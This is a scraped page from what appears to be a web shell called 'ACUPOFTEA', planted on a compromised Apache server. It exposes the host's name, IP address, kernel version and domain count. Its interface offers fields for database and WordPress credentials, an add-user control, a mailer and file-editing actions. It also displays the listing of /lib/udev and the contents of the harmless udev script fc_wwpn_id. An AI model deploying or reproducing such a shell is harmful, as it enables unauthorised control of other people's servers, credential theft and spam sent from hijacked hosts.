System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
udev
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
fc_wwpn_id
#!/bin/bash # # fc_wwpn_id # # Generates device node names links based on FC WWPN # Copyright (c) 2016 Hannes Reinecke, SUSE Linux GmbH # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation version 2 of the License. # DEVPATH=$1 SCSIPATH=$(cd -P "/sys$DEVPATH/device" || exit; echo "$PWD") d=$SCSIPATH [ -d "$d/scsi_disk" ] || exit 0 target_lun=${d##*:} while [ -n "$d" ] ; do d=${d%/*} e=${d##*/} case "$e" in rport*) rport=$e rport_dir="/sys/class/fc_remote_ports/$rport" if [ -d "$rport_dir" ] ; then rport_wwpn=$(cat "$rport_dir/port_name") fi ;; host*) host=$e host_dir="/sys/class/fc_host/$host" if [ -d "$host_dir" ] ; then host_wwpn=$(cat "$host_dir/port_name") break; fi esac done if [ -n "$rport_wwpn" ] || [ -n "$host_wwpn" ] ; then echo "FC_TARGET_LUN=$target_lun" fi if [ -n "$rport_wwpn" ] ; then echo "FC_TARGET_WWPN=$rport_wwpn" fi if [ -n "$host_wwpn" ] ; then echo "FC_INITIATOR_WWPN=$host_wwpn" fi
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-04-23 10:58:40
..
DIR
-
dr-xr-xr-x
2025-09-30 10:57:16
hwdb.d
DIR
-
drwxr-xr-x
2025-04-23 10:57:57
rules.d
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
ata_id
application/x-sharedlib
40.73 KB
-rwxr-xr-x
2025-04-22 01:58:57
cdrom_id
application/x-sharedlib
32.51 KB
-rwxr-xr-x
2025-04-22 01:58:57
collect
application/x-sharedlib
20.57 KB
-rwxr-xr-x
2025-04-22 01:58:57
fc_wwpn_id
text/x-shellscript
1.1 KB
-rwxr-xr-x
2022-10-08 11:49:23
fido_id
application/x-sharedlib
16.43 KB
-rwxr-xr-x
2025-04-22 01:58:57
kdump-udev-throttler
text/x-shellscript
1.41 KB
-rwxr-xr-x
2024-09-24 08:36:00
kpartx_id
text/x-shellscript
2.33 KB
-rwxr-xr-x
2025-04-22 01:55:39
mtd_probe
application/x-sharedlib
12.41 KB
-rwxr-xr-x
2025-04-22 01:58:57
prefixdevname
application/x-sharedlib
1.46 MB
-rwxr-xr-x
2019-12-16 07:52:38
rename_device
application/x-sharedlib
16.45 KB
-rwxr-xr-x
2022-10-08 11:08:06
scsi_id
application/x-sharedlib
53.7 KB
-rwxr-xr-x
2025-04-22 01:58:57
v4l_id
application/x-sharedlib
11.99 KB
-rwxr-xr-x
2025-04-22 01:58:57
~ ACUPOFTEA - mail.ontime-ae.com